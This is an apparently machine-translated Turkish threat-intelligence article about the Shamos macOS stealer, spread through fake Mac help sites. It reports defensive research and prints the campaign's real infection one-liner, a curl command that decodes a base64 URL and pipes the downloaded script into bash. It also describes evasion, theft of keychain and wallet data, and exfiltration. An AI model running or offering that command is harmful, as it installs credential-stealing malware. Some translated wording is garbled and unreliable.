MacOS kullanıcılarını hedefleyen gelişmiş bir kötü amaçlı yazılım kampanyası Haziran ve Ağustos 2025 arasında ortaya çıktı ve aldatıcı yardım web siteleri aracılığıyla 300’den fazla müşteri ortamından başarılı bir şekilde uzlaşmaya çalıştı.
Kötü niyetli işlem, bu bilgi stealer’ı diğer siber suçlulara kira için kötü amaçlı yazılım olarak işleten siber suçlu grup kurabiye örümcek tarafından geliştirilen kötü şöhretli atomik macOS stealer’ın (AMOS) bir çeşidi olan Shamos’u dağıtıyor.
Saldırı, şüphesiz kullanıcıların “MacOS Flush Resolver önbelleği” gibi ortak macOS sorunlarını giderme çözümlerini aradığında, yalnızca arama sonuçlarında artan kötü niyetli web siteleri karşılamak için başlar.
Mac-safer.com ve Rescue-mac.com da dahil olmak üzere bu hileli siteler, kötü niyetli niyetleri barındırırken meşru teknik destek kaynakları olarak maskelenir.
Kampanya, bağımsız eyalet bölgelerinin topluluğunu hedeflemeyi yasaklayan Rus ecrime forumlarındaki kısıtlamalar nedeniyle Rusya’yı dışlayan ABD, Birleşik Krallık, Japonya, Çin, Kolombiya, Kanada, Meksika ve İtalya da dahil olmak üzere birçok ülkede kullanıcıları hedef aldı.
Crowdstrike araştırmacıları, tehdit aktörlerinin kurbanlara teknik sorunlarını çözmek için yararlı talimatlar sunarak sofistike bir sosyal mühendislik yaklaşımından yararlandığını belirlediler.
Bununla birlikte, bu talimatlar kritik bir aldatma alanı içerir: Mağdurlara kötü amaçlı yazılım kurulum sürecini başlatan kötü amaçlı tek satırlık bir terminal komutu yürütmeleri talimatı verilir.
.webp)
Araştırmacılar, bu sahte web sitelerini tanıtan bir Google reklam profilinin, Avustralya merkezli bir elektronik mağazasını taklit ettiğini ve gelişmiş kimlik sahtekarlık tekniklerini önerdiğini belirtti.
.webp)
Enfeksiyon mekanizması ve teknik uygulama
Kötü amaçlı yazılımların enfeksiyon mekanizması, kurbanların bilmeden yürüttüğü akıllıca gizlenmiş bir terminal komutuna dayanır:-
"curl -fsSL" $ ("echo" "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | "base64 -d") | "bash"Bu komut sırayla birkaç kritik işlem gerçekleştirir. İlk olarak, https://icloudsersvers.com/gm/install url’sini ortaya çıkarmak için Base64 kodlu dizeyi çözer[.]SH, daha sonra bu kötü amaçlı sunucudan bir Bash komut dosyası indirir ve yürütür.
Komut dosyası kullanıcının şifresini yakalar ve daha sonra https://icloudsersers.com/gm/update adresinden shamos mach-o yürütülebilir dosyasını indirir.
/ TMP / dizinine kurulduktan sonra Shamos, tespiti önlemek için birden fazla kaçırma tekniği kullanır.
Kötü amaçlı yazılım, MACOS bekçi güvenlik kontrollerini atlamak için XATTR komutlarını kullanarak genişletilmiş dosya özniteliklerini kaldırır, CHMOD aracılığıyla yürütülebilir izinler atar ve bir güvenlik sanal kutusu ortamında çalışmadığından emin olmak için virtual makine kontrolleri yapar.
Stealer daha sonra kapsamlı ev sahibi keşif ve veri toplama için çeşitli Applescript komutları yürütür.
Shamos özellikle kripto para birimi cüzdan dosyalarını, hassas kimlik bilgisi veritabanlarını, anahtarlık verilerini, Applenotes içeriğini ve tarayıcı saklı bilgileri hedefler.
Kötü amaçlı yazılım paketleri, verileri “out.zip” adlı bir zip arşivinde çaldı ve uzak sunuculara curl komutları kullanarak pessfiltrat ediyor.
Ayrıca Shamos[.]bulucu[.]yardımcı[.]Plist, sudo ayrıcalıkları mevcut olduğunda kullanıcının LaunchDaemons dizinine kaydedildi.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.